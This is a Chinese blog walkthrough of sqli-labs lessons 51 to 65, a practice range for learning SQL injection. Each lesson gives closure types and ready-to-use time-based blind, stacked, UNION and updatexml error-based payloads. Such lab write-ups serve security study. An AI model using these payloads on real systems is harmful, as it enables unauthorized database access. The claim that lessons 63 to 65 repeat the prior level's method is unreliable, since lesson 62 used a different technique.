sqli-labs靶场less51~less65 - 实践

less51

1.我们打开靶场看一下，并且判断一下得到闭合方式为单引号闭合

2.这一关依旧使用时间盲注，首先爆一下数据库的长度

?sort=1' and if(length(database())>1,sleep(5),1)--+
?sort=1' and if(length(database())>8,sleep(5),1)--+

3.剩余步骤和前面几关相同，只有闭合方式不同

less52

1.打开靶场看一下，是数字型注入

2.这一关我们可以使用堆叠注入，在用户名的地方可以进行相关数据的查询

?sort=1;insert into users(id,username,password) values ('17',(select database()),'123456')

3.剩下的部分可以使用以上的语句进行查询，只要在用户名的地方进行select语句进行查询即可

less53

1.打开靶场看一下，判断闭合方式为单引号

2.这一关可以使用上一关的堆叠注入，也可以使用延时注入，在这里博主使用延时注入爆一下数据库的名字长度，剩余内容按照时间盲注往下做就可以了

1' and if(length(database())>1,sleep(5),1)--+
1' and if(length(database())>8,sleep(5),1)--+

less54

1.打开靶场看一下，判断闭合方式为单引号闭合

2.我们使用联和注入来爆内容，首先看回显点

?id=-1'  union select 1,2,3--+

3.接下来数据库名字

?id=-1'  union select 1,database(),3--+

4.剩余部分按照联合注入做即可

less55

这一关与上一关的差别在于闭合方式，这一关闭合方式为一个括号，其余做法与上一关相同

less56

这一关与上一关的差别在于闭合方式，这一关闭合方式为‘），其余做法与上一关相同

less57

这一关与上一关的差别在于闭合方式，这一关闭合方式为“，其余做法与上一关相同

less58

1.打开靶场看一下

2.这一关使用报错注入来进行注入

?id=1' and updatexml(1,concat(1,(select database())),1)--+

less59

这一关和上一关做法相同，都是用报错注入，只不过闭合方式为数字型

less60

这一关和上一关做法相同，都是用报错注入，只不过闭合方式为双引号加括号

less61

这一关和上一关做法相同，都是用报错注入，只不过闭合方式为单引号加两个双引号

less62

1.打开靶场看一下，这一关没有报错信息，所以我们使用时间盲注，闭合方式为单引号加括号

1')and if(length(database())>1,sleep(5),1)--+
1')and if(length(database())>8,sleep(5),1)--+

less63

这一关和上一关一样，使用报错注入，闭合方式为单引号

less64

这一关和前两关一样，使用报错注入，闭合方式为两个括号

less65

这一关和前几关一样，使用报错注入，闭合方式为一个单引号